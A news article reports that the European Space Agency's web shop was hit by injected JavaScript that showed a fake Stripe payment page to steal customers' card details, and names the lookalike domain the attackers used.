The European Space Agency’s official web shop was hacked recently, compromising customer payment card information during the checkout process. This incident, which involved the injection of malicious JavaScript code, has raised significant concerns regarding the security of the agency’s online retail operations, which are integrated with its internal systems. The store, known for selling ESA merchandise, is currently unavailable, displaying a notice that it is “temporarily out of orbit.”
ESA hack unveils a dangerous trend in online shopping fraud
On the day of the attack, e-commerce security company Sansec identified the malicious script that collected sensitive customer data, including payment card details. Investigations revealed that the script generated a fake Stripe payment page, effectively tricking buyers into entering their information. Notably, the fraudulent page looked convincing, presenting itself as part of the official ESA web shop, which may have contributed to the success of the attack.
In terms of cybersecurity threats, the attack leveraged a similar domain name to the legitimate store. While the official ESA shop operates under the “esaspaceshop” domain with a .com TLD, the attacker utilized the same name with a .pics TLD (esaspaceshop[.]pics), a tactic that could easily mislead customers. Such domain spoofing underscores the need for heightened awareness and security measures among online shoppers, especially when it comes to sensitive financial transactions.
- This is how web show main screen looks at the time of writing:
The European Space Agency, which operates with a budget exceeding 10 billion euros, is dedicated to advancing space exploration by training astronauts and developing rockets and satellites to uncover the universe’s mysteries. However, this security breach poses risks not only to customers but also to ESA employees, given the interconnected nature of its systems. The agency has yet to comment publicly on the breach or outline the steps it will take to enhance security moving forward.
Italy slaps OpenAI with a €15M fine over GDPR breach in ChatGPT
As the investigation continues, concerns remain regarding the extent of the data accessed and the potential implications for those whose payment information may have been compromised. The fact that the malicious script employed obfuscated HTML code from the legitimate Stripe SDK adds another layer of complexity to the incident. Stripe, a widely used online payment processing platform, will likely be involved in the ongoing evaluations to help mitigate future risks.
As a result of these developments, customers who have previously made purchases through the ESA web shop are advised to monitor their payment card statements for any unauthorized transactions. It remains unclear how many individuals may have been affected by the breach, and ESA has not yet released detailed information on the number of potentially impacted customers.
Featured image credit: European Space Agency
